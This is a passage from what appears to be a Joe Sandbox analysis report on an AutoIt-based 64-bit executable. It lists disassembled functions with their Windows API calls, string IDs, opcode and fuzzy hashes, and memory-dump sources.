                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                • Instruction ID: 4902c9a8990dfee71a24115accf21bc1a241e6be5c8f129afa75f588aed0f7bb
                                                                                • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                • Instruction Fuzzy Hash: 91918B26B08B8285EB60FF75D4406ECB3B5EB48BA8B894432DE4D87759DF38E455C360
                                                                                Function 00007FF79F8E0EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00007FF79F8E0EDB
                                                                                  • Part of subcall function 00007FF79F8E0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF79F8E0F61), ref: 00007FF79F8E0C6A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharForegroundUpperWindow
                                                                                • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                • API String ID: 3570115564-1994484594
                                                                                • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                • Instruction ID: 828dbedac1fdd1cda1153172e8c3029556c6c6901d822b8be3758a9a156c86dc
                                                                                • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                • Instruction Fuzzy Hash: 3C718E12A1DAC385EFB4BB71D801BF9E2A1AF54794FC44431CA0E86795EF3CE564A220
                                                                                Function 00007FF79F8E9898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                • API String ID: 3964851224-769500911
                                                                                • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                • Instruction ID: b62066bbc37ed968e1890766a51dcd1ece474365d50752a3ebcf55ea18304351
                                                                                • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                • Instruction Fuzzy Hash: 2D41FE22F1969340EAF07F358404AFDE2D16B24BD4BD40931CA5D83794EE7DE9529320
                                                                                Function 00007FF79F8A9B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: #$E$O
                                                                                • API String ID: 3215553584-248080428
                                                                                • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                • Instruction ID: 424aa5c0ce91812e147c1f6450962a6c93ebc245700eb688b20eab55d187a0b7
                                                                                • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                • Instruction Fuzzy Hash: FE418222A1AB9585EFA1AF3198409E9A3B4FF54B88F884431EE4D07759DF3CD461E320
                                                                                Function 00007FF79F8EB62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                • String ID: \*.*
                                                                                • API String ID: 3196045410-1173974218
                                                                                • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                • Instruction ID: 6b97ca7f76933d4873b417322eda43420660d3105db34aef9c111a43ec2ffe90
                                                                                • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                • Instruction Fuzzy Hash: 7A412E22A0868395EBB0FB34D8416FDA764FF95788FC40031DA4D53AA9EF2CD659D710
                                                                                Function 00007FF79F8DDF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClassName
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 787153527-1403004172
                                                                                • Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                • Instruction ID: 6eaea6aa755425408fdde40be1505f258ae6adb11ea7cdaf093f26aa2b01650d
                                                                                • Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                                                • Instruction Fuzzy Hash: 3E31F322A086C286EB70FB21E8409F9E360FF85B94FC54532DA5D47B95CE3CE555D720
                                                                                Function 00007FF79F8FD914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 3113390036-3916222277
                                                                                • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                • Instruction ID: a164d43316653ec23c0cb0d6ed59fbf9dd12922e925886cd4f25e1cd040fafbe
                                                                                • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                • Instruction Fuzzy Hash: 9131C522A1C6C289E7B0AF32A416FEAA350FB94790F945131DF4D57B49DE3CD4229B90
                                                                                Function 00007FF79F9193E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                • Instruction ID: 5fc373760770b5580cc3ff93a2c34eaf3448b8b4d62a0b156afcf0d64be0b55a
                                                                                • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                • Instruction Fuzzy Hash: 42314D32709BC1CAE770EF25A444BAAB7A0FB85BA0F944135DA5947B98DF3DD444CB10
                                                                                Function 00007FF79F899164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                • Instruction ID: e4eabc76b5331633b651bf0ac60584b985e386725f277ddf339f6670894b4055
                                                                                • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                • Instruction Fuzzy Hash: E1F04421A19A8281EE64AB21E8846F9A3A0FF887A0FC51035E90F86758DF3CE494C710
                                                                                Function 00007FF79F8B89B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                                • Instruction ID: 421beeda1b0ac02f485e7768194e92d1500ef18e2a06ba400b787054f6726dd0
                                                                                • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                                • Instruction Fuzzy Hash: BDA1F362A097C286EBB0AF709411BF9A691EF00BA5F984631DA1D077C5DF3CE4779321
                                                                                Function 00007FF79F90E838 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 3488606520-0
                                                                                • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                • Instruction ID: f2a8e8ace390ea3a66fa493f4ca080f1cd5db5fe9ba0b645c1c99eaf6561f2ea
                                                                                • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                                • Instruction Fuzzy Hash: B5817B22B086D285EB64BF328454AEDA7A0BB48FE4F858035DE1D5BB9ACF3CD451C750
                                                                                Function 00007FF79F8AED08 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                • Instruction ID: a85fd8c18713175406bd377ee489d7b179fe90831f4096ee49be0123dd9b2632
                                                                                • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                                • Instruction Fuzzy Hash: 2681E322E1A68285F7B0BBB68840AFDA7A0FB44758F804535CD0E57AD5CF3CE461E720
                                                                                Function 00007FF79F910084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3740051246-0
                                                                                • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                • Instruction ID: 07e3a70efd234ffb4e93765a7310bad0e2eb994fbd3f254e26a24bbb06d14e21
                                                                                • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                • Instruction Fuzzy Hash: B161AC22A08A82C5EB60EB75D4817FDAB70FB84794F904132DA4D47B6ACF7CD195CB60
                                                                                Function 00007FF79F90D0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D176
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D217
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D236
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D281
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F90C2BF), ref: 00007FF79F90D2A0
                                                                                  • Part of subcall function 00007FF79F894120: WideCharToMultiByte.KERNEL32 ref: 00007FF79F894160
                                                                                  • Part of subcall function 00007FF79F894120: WideCharToMultiByte.KERNEL32 ref: 00007FF79F89419C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                • String ID:
                                                                                • API String ID: 666041331-0
                                                                                • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                • Instruction ID: 22921ea7e11c888b3dda062477bdbad7b2f3d17a3ef7476e436edd8063f33e40
                                                                                • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                • Instruction Fuzzy Hash: F3515D32A14B82C5EB60EF66D8805ECB374FB88BA4B994432DE4E87355DF38E451C360
                                                                                Function 00007FF79F8B2998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                • Instruction ID: 334ab9d16f11a7208309e917897e3273e665ef6edb2f5598b201f83314328091
                                                                                • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                • Instruction Fuzzy Hash: 0B51D332A087C285E7B2AF31A4409B9F794EF40BA1F955331DA6D476D8DE3CE461E310
                                                                                Function 00007FF79F8F96A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                • String ID:
                                                                                • API String ID: 2832842796-0
                                                                                • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                • Instruction ID: 1695b8c23c6d85513c62c9c9410379fc94f6ad1c0d49f5efc4dd7552abdcee8a
                                                                                • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                                                • Instruction Fuzzy Hash: 19513D26A18B8282DB60EF26D4816ADB760FB88F94F549432EF8E47766CF3CD450C750
                                                                                Function 00007FF79F871CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                • Instruction ID: 70f36f2d7263eef71e5549c4f0d68371240a37059f47bf923cf40c7cd4a28698
                                                                                • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                • Instruction Fuzzy Hash: 2451C736B09AC19BD7A4EF35C540AE9B750FB497A4F500231EE5983BD5CF38E4A19B10
                                                                                Function 00007FF79F8ABA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
